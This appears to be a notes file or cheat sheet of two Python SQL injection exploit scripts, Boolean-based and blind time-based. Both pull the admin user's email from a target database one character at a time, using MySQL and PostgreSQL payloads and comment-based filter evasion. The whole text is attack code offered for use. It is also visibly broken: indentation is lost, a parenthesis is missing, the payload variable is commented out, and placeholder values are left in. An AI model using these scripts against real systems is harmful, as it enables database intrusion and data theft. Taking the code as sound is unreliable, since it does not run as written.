SQL Injection

Boolean

import requests
import sys
#import urllib3
#urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def test_injection(url, condition):
req = requests.get(url)#, verify=False)
if condition in req.text: # Check whether the condition has occurred. If so, the injection has been successful.
return True
else:
return False
def extract(target, injection, query, condition):
pos = 1
extracted = ""
while True:
for ascii_char in range(32, 126): # Iterate over the ascii range of characters.
if test_injection(target + injection.format(query, pos, ascii_char).replace(" ","/**/"), condition):
extracted += chr(ascii_char)
pos += 1
break
else:
return extracted
def get_admin_email(target, injection, condition):
query = "SELECT email FROM users WHERE username = 'admin'"
return extract(target, injection, query, condition)
def main():
if len(sys.argv) != 4:
print("[+] Usage: {} TARGET LHOST LPORT".format(sys.argv[0]))
sys.exit(-1)
target = sys.argv[1]
lhost = sys.argv[2]
lport = sys.argv[3]
## MySQL
# injection = "') AND ASCII(SUBSTR(({}),{},1))={}%23" # Declare the injection string.
# injection = "') AND ASCII(SUBSTR(({}),{},1)){}%23" # Declare the injection string.
## PostgreSQL
# injection = "') AND ASCII(SUBSTR(({}),{},1))={}%23" # Declare the injection string.
# injection = "') AND ASCII(SUBSTR(({}),{},1))={}%23" # Declare the injection string.
extracted_data = get_admin_email(target, injection, "CONDITION")
print("[+] EXTRACTED: {}".format(extracted_data)
if __name__ == "__main__":
main()

Blind Time-Based

import requests
import sys
#import urllib3
#urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def test_injection(url, time_condition):
req = requests.get(url)#, verify=False)
if req.elapsed.total_seconds() > int(time_condition): # Check whether the condition has occurred. If so, the injection has been successful.
return True
else:
return False
def extract(target, injection, query, time_condition):
pos = 1
extracted = ""
while True:
for ascii_char in range(32, 126): # Iterate over the ascii range of characters.
if test_injection(target + injection.format(query, pos, ascii_char).replace(" ","/**/"), time_condition):
extracted += chr(ascii_char)
pos += 1
break
else:
return extracted
def get_admin_email(target, injection, time_condition):
query = "SELECT email FROM users WHERE username = 'admin'"
return extract(target, injection, query, time_condition)
def main():
if len(sys.argv) != 4:
print("[+] Usage: {} TARGET LHOST LPORT".format(sys.argv[0]))
sys.exit(-1)
target = sys.argv[1]
lhost = sys.argv[2]
lport = sys.argv[3]
## MySQL
# injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND SLEEP(5)%23" # Declare the injection string.
# injection = "') AND ASCII(SUBSTR(({}),{},1)){} AND BENCHMARK(3000000,SHA1(1337))%23" # Declare the injection string. # average 2-3 seconds
## PostgreSQL
# injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND (SELECT 1 FROM pg_sleep(10))=1%23" # Declare the injection string.
# injection = "') AND ASCII(SUBSTR(({}),{},1))={} AND (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))=1%23" # Declare the injection string.
extracted_data = get_admin_email(target, injection, NUMBER_OF_SECONDS_TO_DETECT)
print("[+] EXTRACTED: {}".format(extracted_data))
if __name__ == "__main__":
main()